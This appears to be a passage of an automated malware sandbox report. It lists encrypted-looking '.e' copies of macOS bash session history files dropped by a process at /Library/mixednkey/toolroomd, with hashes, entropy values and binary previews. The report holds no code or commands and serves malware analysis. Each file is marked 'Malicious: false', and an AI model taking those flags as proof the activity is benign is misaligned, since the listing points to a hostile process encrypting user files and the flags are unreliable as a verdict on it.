Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.3F4F72D9-982B-4DDE-BE57-0F410DB9FD5D.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	346
Entropy (8bit):	4.78538101503198
Encrypted:	false
SSDEEP:	6:H1Ghe0ZlSBzsewLYHEec/LaqG8rQQwiQ/6:V90XOsewLYTc+qGm7
MD5:	9249D8454B067D5434E0B66B8A4A9F05
SHA1:	CF44C3A6242E7F7E38244A6E862BC8A1F27274D3
SHA-256:	884C2CF7E2AD4CC4135A155091E39089B8A0029A2701A608697CF92015C8E1AC
SHA-512:	B05B6F0D22310EF8EB062234877E4F7F15D04FF8731CEAE696D500614BFFC7EB9CBA3B56D2C9985141062574DABDCBD803839A7A62238B512D1B6C3228D86C82
Malicious:	false
Preview:	.xA...m.dK...Q.....p...`.hB.A'.T.f.u..).................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.3F4F72D9-982B-4DDE-BE57-0F410DB9FD5D.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.44E5E857-A87B-40B0-9C16-BE47EEE10853.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1050
Entropy (8bit):	7.190470603762622
Encrypted:	false
SSDEEP:	24:aJRGgybZVV+R9V50PZuChkU7tV2oKsRGgyFtu3035sePc0m7:afIV4R9j0PUCmUpV9Kwstu3035Npq
MD5:	4594F7A0774E6233E60FB753A804CCFA
SHA1:	D3D6C9DA467D5D81E1D1FD842D50010CB737CB0C
SHA-256:	39AED08446CDDA4076704FE05854F25E13500A2A36E3D76988C73A340E8969AB
SHA-512:	8A739B320728BBB56B024A541DB26E7E81AFD761A55FDCC4217370F88265E34D0DCF4B197D57A2B66A406E7F196B4E0332FDF5F0B5A678E6FB9E7124E2874607
Malicious:	false
Preview:	.D.cC...}.H..[..v.}....Cz2...rgI..x.......{....~).G....=...].6.'.:v.:.2..=g....E....D.4c#.o...../.....;\|y.a.R+.:.J.h}$....o.)R....[p.."..\..D.Lv(PD$h.O~.'.Gz...^.b}...,.R..Z>/.q.P../$L.5cT.v(PD$h.O......#...........R.._...92.DoJ.%....U8Z.X.......+.......@.-b..6.?......2.P.4..2....&....z.#.z............e:...^(.e..&.1B..x...I....W..O.`,.E...%..^......G....79~..).Cj.....VR...^...'.N..,.!D..../I'-...v.C...#.....Ghn...y....h...6r..k..5..'..4E.U...)....?.....#5".L.:h..o].....-..2../L.8.p.Z..l@..'.m+.......o'h8..~....].D.4c#.o...../.....;\|y.a.R+.:.Q.X.8B..L.eH......G[.M.o...YMQJ.J..[...KCl_.a.Jaf7..-K.\,..<.`..A........7T.F..uQ..?...f7..-K.\,..<.`..A..........K..q&....dt5.$ng..9>..2..J...B!.h....o.{+.W...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................

/Users/berri/.bash_sessions/.44E5E857-A87B-40B0-9C16-BE47EEE10853.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.4F1B0166-6094-4AC7-BDC1-19AD07F91616.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	626
Entropy (8bit):	6.479652057832709
Encrypted:	false
SSDEEP:	12:gFL/tRG/YybQSNHGC+RTKJ+Vmi002ZfGTvGhk2IsewLYTc+qGm7:aJRGgybZVV+R9V50PZuChk2IsePc0m7
MD5:	55B4B97AB4A841A6BF3C0770BFE161D6
SHA1:	13D69E1D994199312A90AF65D46B7543E9DA69AF
SHA-256:	6E3926D417F5B6DF86FAA3B42AC8334DE066B1F35FA735F363AC627DFBF66233
SHA-512:	EE9019A5F1EEDCB7359D54C1EB803FACB25F7BA0C2BE69F661A8CDB181106F343D8CA7B5D8B091BF7878B4708A3417B2D9BCF2580B76E40294516527C85038AC
Malicious:	false
Preview:	.D.cC...}.H..[..v.}....Cz2...rgI..x.......{....~).G....=...].6.'.:v.:.2..=g....E....D.4c#.o...../.....;\|y.a.R+.:.J.h}$....o.)R....[p.."..\..D.Lv(PD$h.O~.'.Gz...^.b}...,.R..Z>/.q.P../$L.5cT.v(PD$h.O......#...........R.._...92.DoJ.%....U8Z.X.......+.......@.-b..6.?......2.P.4..2....&....z.#.z......l.d5e...A.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.4F1B0166-6094-4AC7-BDC1-19AD07F91616.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.53850C24-44F5-4CD9-B391-C3DB18E01593.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	786
Entropy (8bit):	6.822871675576257
Encrypted:	false
SSDEEP:	24:aJRGgybZVV+R9V50PZuChkU7tV21sePc0m7:afIV4R9j0PUCmUpVmNpq
MD5:	D45133759257611F852E2834BF470971
SHA1:	42B65E5A34AE6481824405F8D84D94C86D2236D1
SHA-256:	C593875A6340652552D62272A98AE3FF8552529C0AD612498BF117B3CE87572A
SHA-512:	9EB89E452669C26F2BCFF3D9DCAA8231356679CEE6EC00A4F698C3817883DCB6E54330CB50DD846135013F728213B75F1776D336069D657F460E458D7DF71B1B
Malicious:	false
Preview:	.D.cC...}.H..[..v.}....Cz2...rgI..x.......{....~).G....=...].6.'.:v.:.2..=g....E....D.4c#.o...../.....;\|y.a.R+.:.J.h}$....o.)R....[p.."..\..D.Lv(PD$h.O~.'.Gz...^.b}...,.R..Z>/.q.P../$L.5cT.v(PD$h.O......#...........R.._...92.DoJ.%....U8Z.X.......+.......@.-b..6.?......2.P.4..2....&....z.#.z............e:...^(.e..&.1B..x...I....W..O.`,.E...%..^......G....79~..).Cj.....VR...^...'.N..,.!D..../I'-...v.C...#.....Ghn...y....h...6r..k..5..'..4E.U...)....?...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.53850C24-44F5-4CD9-B391-C3DB18E01593.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.639B602D-9E09-436A-BFD7-D5C62C5DBF82.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	322
Entropy (8bit):	4.489209129397836
Encrypted:	false
SSDEEP:	3:fOdeIz/Xlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:mdeQUBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	A125C412913555159FA36524B1DAD815
SHA1:	48F39E6A208EE2A652B0DC0AE15A6856C65B6239
SHA-256:	1F5E2BBD30DB0EFFB3FB850D1A779C9498DBBAFF69C9B8515EDC2E0452B69B5F
SHA-512:	0C4BBD4B57A371C28313C8C3265322CCA1C07A509CF54BA1E8300766F4E7166CEF284AC5B5EFCAB50C8FA4F192284816238FBE69A16E4F191E4066A031F7E435
Malicious:	false
Preview:	...p.]..{&9.......................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.6926BE27-BCE7-4C7E-8FFB-89D9EC78F11A.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	322
Entropy (8bit):	4.481475511398853
Encrypted:	false
SSDEEP:	3:zDek9CzPFttXlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:zD39+tSBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	1556CF7B8D76A6269AF6C881BBD40D7B
SHA1:	2640238688C77E6EC549EEC512AB9D673B37C55E
SHA-256:	77BECE83B4C46CAFEB85AD0AA48B3E4AF224DE75E2F82F3C5F39D49AC85FF0EC
SHA-512:	F041440FBC222E79B5CF0EF7E3733A2B168CA6E8E4DB61765FD3504B6322E70210545B45A646653DA2751C7E9549D29BAE74124167E4A41C2822D04E4E172BD6
Malicious:	false
Preview:	RIA<f....'........................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.849B4B4C-DBBA-480B-BFF5-006FCCE558FA.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	4.603338024582285
Encrypted:	false
SSDEEP:	3:4N7G1HWlCz1lyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:ZWAzaBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	231F18BCE0EB22B5648C5C3BB39B6EDA
SHA1:	72620AF8268C227A45B6CF1F80CF2443C12D3B08
SHA-256:	75A7CBFC4D1437AADA95B09EAD98E0B747203A059754391630B171721C9F63FD
SHA-512:	E41EDCD6977A0334E9959A997EEECA022823382A931305A87A2AFD6FCFB518ECC8446BC17F01658FFB36550CC313FDBE9640A4F676E236E31EE5B2CB05961542
Malicious:	false
Preview:	.k..5..'..4E.U..A..(.\|...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.98615EBB-D2DF-45F6-8D34-499F9098DE29.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	4.707758112067271
Encrypted:	false
SSDEEP:	6:mZ7bXjNYl/taBzsewLYHEec/LaqG8rQQwiQ/6:KSl/tGsewLYTc+qGm7
MD5:	76A43F0B9CA330D7E90F060442A2086F
SHA1:	96C6BB6E13894D4B66E40C73CC7F0D1B5C9E6C60
SHA-256:	EDA5D278D892A7B6C6E18C3746E1365681F2C27B36DA72AFC65E2C95B693408E
SHA-512:	88BDFFF0D6788662755F3BCF2703D686BD4FB2A49B594406C6C10C0C9A90D546439347B4B05854C59C5E8A154B292352352740B813C830D575BAE8543DCDBC7F
Malicious:	false
Preview:	...p.]........'..:.1.n./......!.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.A1C22BEB-F57B-44E1-9470-D26CBCE7DD06.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.861561284288833
Encrypted:	false
SSDEEP:	3:iSPU6CWxmedPRpk/9lyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiX:jP4kmObBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	04B7825B1662271D1B794B2472F52D67
SHA1:	1FA99EB7815E9AD9CFBD82EC5199FABDF29EBE78
SHA-256:	EDB3BDD0C10B06594CADB84B56BB2BF6E834A6D593260B60B19A5837CEEBFE55
SHA-512:	449F84B53827F5760F228A18E22564BD5EB47BC253166D38A2132D3E9FD35A9CF7169012AD9D84A42DF3F6A5E258AD1A175BF262CDAEAEDF222E045293910F53
Malicious:	false
Preview:	.............-...'F..........;?s..@.%.C...... ..1.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.B265C232-627B-4790-A8B8-B3822113C54A.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	682
Entropy (8bit):	6.610450111001321
Encrypted:	false
SSDEEP:	12:gFL/tRG/YybQSNHGC+RTKJ+Vmi002ZfGTvGhkT4Bp7sKpsewLYTc+qGm7:aJRGgybZVV+R9V50PZuChkU7FsePc0m7
MD5:	55661E36E8B4C8A7D8FF2FAB989C37F3
SHA1:	CD1E029B8F85AAA98042EEEB27010302E13945E2
SHA-256:	EF3C48BEE121C556E3E627CE8050AC1471AF941BEEDBB27492DC5E569B4145F5
SHA-512:	2E3A91FCEC69918C94DCAEE8289C7A6262A8B51C900CCA1E8A939DB937F38E382358B5D20369C5BE223FB78721C400BA8F3F7C36A2F6C9DAF8645BCC4AAE2B3A
Malicious:	false
Preview:	.D.cC...}.H..[..v.}....Cz2...rgI..x.......{....~).G....=...].6.'.:v.:.2..=g....E....D.4c#.o...../.....;\|y.a.R+.:.J.h}$....o.)R....[p.."..\..D.Lv(PD$h.O~.'.Gz...^.b}...,.R..Z>/.q.P../$L.5cT.v(PD$h.O......#...........R.._...92.DoJ.%....U8Z.X.......+.......@.-b..6.?......2.P.4..2....&....z.#.z............e:...^(.e..&.1B..x...I....W..O.`,.E...%..^......G...y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.B265C232-627B-4790-A8B8-B3822113C54A.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.C60309AD-9AF3-409D-ADC5-AEF264639E02.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1234
Entropy (8bit):	7.336281741418713
Encrypted:	false
SSDEEP:	24:aJRGgybZVV+R9V50PZuChkU7tV2oKsRGgyFtu303INRajt0+qsePc0m7:afIV4R9j0PUCmUpV9Kwstu303IDwt0Hu
MD5:	F9A16425D3079C48A0D4589566BA0127
SHA1:	98E350B60C83EA426D701E85C02B8837E1CEA767
SHA-256:	14D8D4A78922DB17258DF59A1220AB6F11E9ED5AA2D9AD2F48680AB1B98E4747
SHA-512:	CB447E4896696582FC43B96329390A9D2F7E27B2B5EFDE7668C223281828CF8F55C6FDD3E9AF70B2F6519540ADB6CE0B5296A591F4EF1ABD0A705A75493C0C25
Malicious:	false
Preview:	.D.cC...}.H..[..v.}....Cz2...rgI..x.......{....~).G....=...].6.'.:v.:.2..=g....E....D.4c#.o...../.....;\|y.a.R+.:.J.h}$....o.)R....[p.."..\..D.Lv(PD$h.O~.'.Gz...^.b}...,.R..Z>/.q.P../$L.5cT.v(PD$h.O......#...........R.._...92.DoJ.%....U8Z.X.......+.......@.-b..6.?......2.P.4..2....&....z.#.z............e:...^(.e..&.1B..x...I....W..O.`,.E...%..^......G....79~..).Cj.....VR...^...'.N..,.!D..../I'-...v.C...#.....Ghn...y....h...6r..k..5..'..4E.U...)....?.....#5".L.:h..o].....-..2../L.8.p.Z..l@..'.m+.......o'h8..~....].D.4c#.o...../.....;\|y.a.R+.:.Q.X.8B..L.eH......G[.M.o...YMQJ.J..[...KCl_.a.Jaf7..-K.\,..<.`..A........7T.F..uQ..?...f7..-K.\,..<.`..A..........K..q&....dt5.$ng..9>..2..J...B!.h....L......N.o.....k..5..'-....."!x..xxC...E....D.4c#.o...../..e........'..8..^@......;....<yD9U.'..pW<..3O...y.(.s.Gkr.9;.r..ESX.;.x.\|x,......].....)~.W.....Q...N...W_\...5 #XA..Q.[.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@..

/Users/berri/.bash_sessions/.C60309AD-9AF3-409D-ADC5-AEF264639E02.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.D633C10E-C2FC-4A25-8A88-85C03207AF10.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	4.603338024582285
Encrypted:	false
SSDEEP:	3:4N7G1HWlCz1lyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:ZWAzaBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	231F18BCE0EB22B5648C5C3BB39B6EDA
SHA1:	72620AF8268C227A45B6CF1F80CF2443C12D3B08
SHA-256:	75A7CBFC4D1437AADA95B09EAD98E0B747203A059754391630B171721C9F63FD
SHA-512:	E41EDCD6977A0334E9959A997EEECA022823382A931305A87A2AFD6FCFB518ECC8446BC17F01658FFB36550CC313FDBE9640A4F676E236E31EE5B2CB05961542
Malicious:	false
Preview:	.k..5..'..4E.U..A..(.\|...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.E499D2F8-4CBA-464F-AD65-1B3663DD9343.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	530
Entropy (8bit):	6.145305203914834
Encrypted:	false
SSDEEP:	6:ZxFyipuUJHPpb86bM/7DXiOMrgDuLxaBzsewLYHEec/LaqG8rQQwiQ/6:ZdJxbk7DXijrDcsewLYTc+qGm7
MD5:	BDC0D0C4B01FA1AF80C174A16D49A580
SHA1:	475A290F4D9564792F0840ADC1A66A549DCAE915
SHA-256:	F9177EB6D441DAD4F365822CE6D2AA5FF6F37DC56BCE5E8BD1A90E94F68F4BCF
SHA-512:	767E73ED55F359C8BC5C06E0A340220789973E061C3DCC6356828246BE5B1AC864AE4BB6C42C0B45A2AF51C9BE4DBF01B516605BB9B111FBDB56BF75B66B6673
Malicious:	false
Preview:	.-....cC......\|4...xd.;.&..y...,D.@..cg?z..GT.....Z%).rs...5.g?z..GT...1.........e..]....ic.....e..3.@v..3......u....C..........kv.I.(.._..[.[.e.;v...f..g.'+a:3Fqr..B.EP.......?..!....e.7..i_.........l;...r.C...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.E499D2F8-4CBA-464F-AD65-1B3663DD9343.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.E644371A-2504-4862-8E9A-B0D3FB6EE159.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	634
Entropy (8bit):	6.527567839226101
Encrypted:	false
SSDEEP:	6:ZxFyipuUJHPpb86bM/7DXiOMrgDurbJymr9DctAEKsfA/MBzsewLYHEec/LaqG83:ZdJxbk7DXijrfHRDHdgsewLYTc+qGm7
MD5:	822CD8D6ACB6B689EA8F4DBB186F4308
SHA1:	6BD5672C048F242BFCA842D0B40187D1F21BEA79
SHA-256:	1B90E5E49FCE777C07084E1507705C1F01F9C398E57B4DE18249E398B56B78C2
SHA-512:	EC70A70BC2E825698C91CF80BBC4AC5D603187454CABAD012C33E3403601905EE4FBBB2492C78D1318933B582A3484C81282FE5F4C9BCB47B8D126F24EB67568
Malicious:	false
Preview:	.-....cC......\|4...xd.;.&..y...,D.@..cg?z..GT.....Z%).rs...5.g?z..GT...1.........e..]....ic.....e..3.@v..3......u....C..........kv.I.(.._..[.[.e.;v...f..g.'+a:3Fqr..B.EP.......?..!....e.7..i_............~s......%..4].n...$.....>5 ...Gb8..~....]C.I......'...K...v..1.J.%....U%...{.....]....z...z.x..w.K.....I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.E644371A-2504-4862-8E9A-B0D3FB6EE159.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.bash_sessions/.F01EAF3E-0906-4403-806A-CA639D38E2A8.history.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	514
Entropy (8bit):	5.979801253941019
Encrypted:	false
SSDEEP:	12:gFL/tRG/YybQSNHGC+RTKJ+VPQsewLYTc+qGm7:aJRGgybZVV+R9VYsePc0m7
MD5:	597D63B7FE22805ABBF257922668EBEA
SHA1:	A2F6F9B070E30FDC091C6F5738079DB0E95E85AC
SHA-256:	BD5CCBA8BEB1F00895F5B819B07452DAF474B3B8B99BED4B50FC3C3B53AAE533
SHA-512:	22638159ED97255777F447037609592C67009BDD9B3AA62E58FA3D0E01829E180C59A62581C068C6AB7EA6F402E00BB26F42527C0D0CA452C7E12A24DFBC18C2
Malicious:	false
Preview:	.D.cC...}.H..[..v.}....Cz2...rgI..x.......{....~).G....=...].6.'.:v.:.2..=g....E....D.4c#.o...../.....;\|y.a.R+.:.J.h}$....o.)R....[p.."..\..D.Lv(PD$h.O~.'.Gz...^.b}...,.R..Z>/.q.P../$L.5cT.v(PD$h.O...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

